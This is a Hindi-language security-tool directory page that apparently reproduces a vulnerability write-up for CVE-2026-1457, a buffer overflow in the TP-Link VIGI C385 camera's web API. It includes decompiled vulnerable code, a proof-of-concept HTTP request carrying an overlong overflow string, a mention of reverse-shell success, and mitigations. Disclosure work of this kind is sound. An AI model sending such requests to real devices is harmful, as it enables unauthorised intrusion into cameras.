Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1457 — CVE-2026-1457 के लिए विस्तृत विश्लेषण और प्रूफ-ऑफ-कॉन्सेप्ट प्रदान करता है, जो TP-Link VIGI C385 वेब API में एक प्रमाणित बफर ओवरफ्लो है जो रिमोट कोड निष्पादन की ओर ले जाता है। | Kitploit
उपकरण/GitHubGitHub/ii4gsp/cve-2026-1457
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलबाइनरी शोषण
GitHubii4gsp/cve-2026-1457

CVE-2026-1457

CVE-2026-1457 के लिए विस्तृत विश्लेषण और प्रूफ-ऑफ-कॉन्सेप्ट प्रदान करता है, जो TP-Link VIGI C385 वेब API में एक प्रमाणित बफर ओवरफ्लो है जो रिमोट कोड निष्पादन की ओर ले जाता है।

रिपॉजिटरी देखें
67 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-1457: TP-Link VIGI C385 प्रमाणित रिमोट कोड निष्पादन

अवलोकन

CVE-2026-1457 TP-Link VIGI C385 V1 के वेब API में एक प्रमाणित बफर ओवरफ्लो भेद्यता है। यह भेद्यता प्रमाणित हमलावरों को रिमोट कोड निष्पादन (RCE) करने की अनुमति देती है।

CVSS v4.0 स्कोर: 8.5 (उच्च)

CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

प्रभावित उत्पाद

उत्पाद मॉडलप्रभावित संस्करण
VIGI C385 V1< 3.1.1 Build 251124 Rel.50371n

भेद्यता विवरण

भेद्यता स्थान

set_resolution_18AAD8 फ़ंक्शन लंबाई सत्यापन के बिना उपयोगकर्ता इनपुट को बफर में कॉपी करने के लिए strcpy का उपयोग करता है, जिसके परिणामस्वरूप बफर ओवरफ्लो होता है।

भेद्यता कोड विश्लेषण

root@kitploit:~
int __fastcall set_resolution_18AAD8(int a1, char a2)
{
  const char *string_origin; // r5
  const char *v4; // r4
  int result; // r0
  char v6[72]; // [sp+0h] [bp-A0h] BYREF
  char v7[88]; // [sp+48h] [bp-58h] BYREF

  memset(v6, 0, sizeof(v6));
  memset(v7, 0, 72);
  string_origin = jso_obj_get_string_origin(a2, (char)"secname");
  v4 = jso_obj_get_string_origin(a2, (char)"resolution");
  sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
  sub_1FE6BC((int)"/video/minor", (int)v7, 0x44u);
  if ( !strcmp(string_origin, "main") )
  {
    result = strcmp(v4, &v6[29]);
    if ( result )                               // true if v4 is greater than &v6[29]
    {
      sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
      strcpy(&v6[29], v4);                      // ⚠️ buffer overflow
      sub_1FE804("/video/main", v6, 72);
      return 0;
    }
  }
  else if ( !strcmp(string_origin, "minor") )
  {
    result = strcmp(v4, &v7[29]);
    if ( result )
    {
      sub_1FE6BC((int)"/video/minor", (int)v7, 0x48u);
      strcpy(&v7[29], v4);                      // ⚠️ buffer overflow
      sub_1FE804("/video/minor", v7, 72);
      return 0;
    }
  }
  else
  {
    msg_debug(3, "http_do_setResolution", 3137, "[HTTPD]set resolution param error.\n");
    return -40209;
  }
  return result;
}

मूल कारण

  1. v6 बफर 72 बाइट्स के रूप में घोषित किया गया है, लेकिन strcpy स्थिति &v6[29] पर किया जाता है।
  2. v7 बफर 88 बाइट्स के रूप में घोषित किया गया है, लेकिन strcpy स्थिति &v7[29] पर किया जाता है।
  3. strcpy का उपयोग करने से पहले उपयोगकर्ता इनपुट (v4) की लंबाई सत्यापित नहीं की जाती है, जिससे बफर ओवरफ्लो होता है।
  4. शेष बफर स्थान क्रमशः केवल 43 बाइट्स (v6) और 59 बाइट्स (v7) है, लेकिन लंबे स्ट्रिंग कॉपी किए जा सकते हैं।

हमला परिदृश्य

आवश्यकताएँ

  • प्रमाणित सत्र (मान्य stok टोकन आवश्यक)
  • नेटवर्क पहुंच (समान नेटवर्क या प्रशासनिक नेटवर्क)

हमला वेक्टर

एक हमलावर /ds एंडपॉइंट की set_resolution कार्यक्षमता का शोषण करके दुर्भावनापूर्ण पेलोड भेज सकता है।

प्रमाण की अवधारणा

HTTP अनुरोध उदाहरण

root@kitploit:~
POST /stok=9p73~f9L0fGs33wt3D3XDc)7u)!wt83f/ds HTTP/1.1
Host: 192.168.0.100
Content-Length: 3015
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Origin: https://192.168.0.100
Connection: close

{
  "video": {
    "set_resolution": {
      "secname": "main",
      "resolution": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    }
  },
  "method": "do"
}

शोषण परिणाम

इस दस्तावेज़ में निष्पादन योग्य शोषण कोड शामिल नहीं है। निम्नलिखित स्क्रीनशॉट रिवर्स शेल कनेक्शन के परिणामस्वरूप सफल शोषण को प्रदर्शित करता है:

Reverse Shell Success

शमन

अनुशंसित कार्रवाइयाँ

  1. फर्मवेयर अपडेट: प्रभावित डिवाइस को संस्करण 3.1.1 Build 251124 Rel.50371n या बाद में अपडेट करें।

  2. नेटवर्क अलगाव: यदि संभव हो, तो VIGI C385 डिवाइस को एक अलग नेटवर्क खंड में रखें।

  3. पहुंच नियंत्रण: प्रबंधन इंटरफ़ेस तक पहुंच को केवल विश्वसनीय नेटवर्क तक सीमित करें।

  4. निगरानी: असामान्य नेटवर्क ट्रैफ़िक या डिवाइस व्यवहार की निगरानी करें।

अस्थायी शमन उपाय

  • वेब प्रबंधन इंटरफ़ेस तक बाहरी पहुंच को अवरुद्ध करें।
  • मजबूत प्रमाणीकरण क्रेडेंशियल का उपयोग करें।
  • अनावश्यक नेटवर्क सेवाओं को अक्षम करें।

समयरेखा

  • 2025-04-25: भेद्यता खोजी गई
  • 2025-08-29: भेद्यता TP-Link को रिपोर्ट की गई
  • 2026-01-29: सुरक्षा सलाह प्रकाशित की गई
  • 2026-01-29: सार्वजनिक प्रकटीकरण

संदर्भ

  • TP-Link सुरक्षा सलाह
  • CVE-2026-1457

श्रेय

इस भेद्यता की खोज और विश्लेषण निम्नलिखित द्वारा किया गया:

  • SeonGoo Lee (classun9)
  • MinSeong Kim (ii4gsp)

NSHC RedAlert Labs के

टूल डाउनलोड करें